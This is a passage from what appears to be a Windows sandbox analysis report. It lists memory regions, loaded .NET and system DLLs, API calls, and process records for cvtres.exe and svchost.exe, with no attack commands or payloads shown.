"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 668 start_va = 0x1db0000 end_va = 0x231afff monitored = 1 entry_point = 0x2288b2a region_type = mapped_file name = "mscorlib.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorlib.dll") Region: id = 669 start_va = 0xbb0000 end_va = 0xf13fff monitored = 1 entry_point = 0xed6b8e region_type = mapped_file name = "system.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\System.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\system.dll") Region: id = 670 start_va = 0x1db0000 end_va = 0x24b6fff monitored = 1 entry_point = 0x23cf38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 671 start_va = 0x6e0000 end_va = 0x859fff monitored = 1 entry_point = 0x84008e region_type = mapped_file name = "system.core.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\System.Core.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\system.core.dll") Region: id = 672 start_va = 0x24c0000 end_va = 0x2a2afff monitored = 1 entry_point = 0x2998b2a region_type = mapped_file name = "mscorlib.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorlib.dll") Region: id = 673 start_va = 0xf20000 end_va = 0xf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 674 start_va = 0xf60000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 675 start_va = 0x2a30000 end_va = 0x2f9afff monitored = 1 entry_point = 0x2f08b2a region_type = mapped_file name = "mscorlib.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorlib.dll") Region: id = 676 start_va = 0x69ec0000 end_va = 0x69ee6fff monitored = 1 entry_point = 0x69eda900 region_type = mapped_file name = "mscorpehost.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorpehost.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorpehost.dll") Region: id = 677 start_va = 0x2a30000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 678 start_va = 0x2a70000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 721 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "res41e4.tmp" filename = "\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\RES41E4.tmp" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\res41e4.tmp") Thread: id = 23 os_tid = 0x884 [0093.092] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0093.092] _initialize_onexit_table (_Table=0x69f0ac64) returned 0 [0093.092] _initialize_onexit_table (_Table=0x69f0ac70) returned 0 [0093.092] RtlInitializeSListHead (in: ListHead=0x69f0ac80 | out: ListHead=0x69f0ac80) [0093.094] __vcrt_InitializeCriticalSectionEx () returned 0x1 [0093.094] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x71990000 [0093.094] GetProcAddress (hModule=0x71990000, lpProcName="InitializeConditionVariable") returned 0x77729981 [0093.094] GetProcAddress (hModule=0x71990000, lpProcName="SleepConditionVariableCS") returned 0x76073014 [0093.095] GetProcAddress (hModule=0x71990000, lpProcName="WakeAllConditionVariable") returned 0x776f45a5 [0093.095] RtlInitializeConditionVariable () returned 0x69f0a92c [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f06d40) returned 0 [0093.095] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09370) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09290) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09270) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09320) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f092c0) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f092a0) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f092e0) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09300) returned 0 [0093.096] GetProcessHeap () returned 0x470000 [0093.096] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09340) returned 0 [0093.096] RtlWakeAllConditionVariable () returned 0x0 [0093.096] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09350) returned 0 [0093.096] RtlWakeAllConditionVariable () returned 0x0 [0093.096] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09360) returned 0 [0093.096] GetVersionExA (in: lpVersionInformation=0x39d9b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x39d9b8, dwMinorVersion=0x39d9c8, dwBuildNumber=0x39d9cc, dwPlatformId=0x39d9d0, szCSDVersion="ôsðid¬ði`\x93ðiÜÙ9") | out: lpVersionInformation=0x39d9b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.096] DisableThreadLibraryCalls (hLibModule=0x69ef0000) returned 0 [0093.096] CreateALink () returned 0x0 [0093.096] malloc (_Size=0x34) returned 0x492710 [0093.096] malloc (_Size=0x104) returned 0x4930a8 [0093.096] malloc (_Size=0x2) returned 0x489800 [0093.096] malloc (_Size=0x104) returned 0x4931b8 [0093.096] malloc (_Size=0x2) returned 0x489810 [0096.656] CoCreateGuid (in: pguid=0x39d82c | out: pguid=0x39d82c*(Data1=0x3aad49c9, Data2=0x4d51, Data3=0x44e2, Data4=([0]=0xaa, [1]=0x78, [2]=0x7b, [3]=0x9c, [4]=0x86, [5]=0x26, [6]=0x34, [7]=0x1e))) returned 0x0 [0096.870] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x39d8a0 | out: ppstm=0x39d8a0*=0x4a69f0) returned 0x0 [0096.873] IUnknown:AddRef (This=0x4a69f0) returned 0x2 [0096.874] IStream:RemoteSeek (in: This=0x4a69f0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0096.875] ISequentialStream:RemoteWrite (in: This=0x4a69f0, pv=0x506ae0*=0x42, cb=0x3ac, pcbWritten=0x39d71c | out: pcbWritten=0x39d71c*=0x3ac) returned 0x0 [0096.876] IUnknown:Release (This=0x4a69f0) returned 0x1 [0096.876] IStream:Stat (in: This=0x4a69f0, pstatstg=0x39d8b8, grfStatFlag=0x1 | out: pstatstg=0x39d8b8) returned 0x0 [0096.876] IStream:RemoteSeek (in: This=0x4a69f0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0096.876] ISequentialStream:RemoteRead (in: This=0x4a69f0, pv=0x506ae0, cb=0x3ad, pcbRead=0x39d89c | out: pv=0x506ae0*=0x42, pcbRead=0x39d89c*=0x3ac) returned 0x0 [0096.876] IUnknown:Release (This=0x4a69f0) returned 0x0 Process: id = "3" image_name = "cvtres.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\cvtres.exe" page_root = "0x7ef473e0" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x94" cmd_line = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\RES41E4.tmp\" \"c:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\CSCB0BF2A73E23E4DE8AAB47EB279B9D1D0.TMP\"" cur_dir = "C:\\Windows\\system32\\" os_username = "MYB7ZA2AF\\5AlR3U30D3" bitness = "32" os_groups = "MYB7ZA2AF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e73d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 679 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 680 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 681 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 682 start_va = 0x60000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 683 start_va = 0x12f0000 end_va = 0x12fafff monitored = 0 entry_point = 0x12f50d0 region_type = mapped_file name = "cvtres.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\cvtres.exe") Region: id = 684 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 685 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 686 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 687 start_va = 0x7ffd4000 end_va = 0x7ffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 688 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 689 start_va = 0x160000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 690 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 691 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 692 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 693 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 694 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 695 start_va = 0x160000 end_va = 0x1c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 696 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 697 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 698 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 699 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 700 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 701 start_va = 0x70790000 end_va = 0x707a3fff monitored = 0 entry_point = 0x7079ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 702 start_va = 0x6c2f0000 end_va = 0x6c39afff monitored = 0 entry_point = 0x6c385f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 703 start_va = 0x1d0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 704 start_va = 0x71990000 end_va = 0x71992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 705 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 706 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 707 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 708 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 709 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 710 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 711 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 712 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 713 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 714 start_va = 0x410000 end_va = 0x6defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 715 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 716 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 717 start_va = 0x50000 end_va = 0x50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 718 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 719 start_va = 0x50000 end_va = 0x50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 720 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Thread: id = 24 os_tid = 0x8c4 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ef471a0" os_pid = "0x330" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ae26" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 778 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 779 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 780 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 781 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 782 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 783 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 784 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 785 start_va = 0x170000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 786 start_va = 0x1b0000 end_va = 0x216fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 787 start_va = 0x220000 end_va = 0x2e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 788 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 789 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 790 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 791 start_va = 0x320000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 792 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 793 start_va = 0x370000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 794 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 795 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 796 start_va = 0x540000 end_va = 0x54afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 797 start_va = 0x550000 end_va = 0x553fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 798 start_va = 0x560000 end_va = 0x569fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 799 start_va = 0x570000 end_va = 0x57cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 800 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 801 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 802 start_va = 0x5d0000 end_va = 0x5d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 803 start_va = 0x5e0000 end_va = 0x5e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 804 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 805 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 806 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 807 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 808 start_va = 0x630000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 809 start_va = 0x640000 end_va = 0x643fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 810 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 811 start_va = 0x690000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 812 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 813 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 814 start_va = 0x6c0000 end_va = 0x6c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 815 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 816 start_va = 0x6e0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000008.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000008.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000008.db") Region: id = 817 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 818 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 819 start_va = 0x730000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 820 start_va = 0x740000 end_va = 0x741fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 821 start_va = 0x750000 end_va = 0x757fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 822 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 823 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 824 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 825 start_va = 0x7c0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 826 start_va = 0x800000 end_va = 0xacefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 827 start_va = 0xad0000 end_va = 0xaebfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 828 start_va = 0xaf0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 829 start_va = 0xb30000 end_va = 0xb30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 830 start_va = 0xb40000 end_va = 0xb40fff monitored = 0 entry_point = 0x0 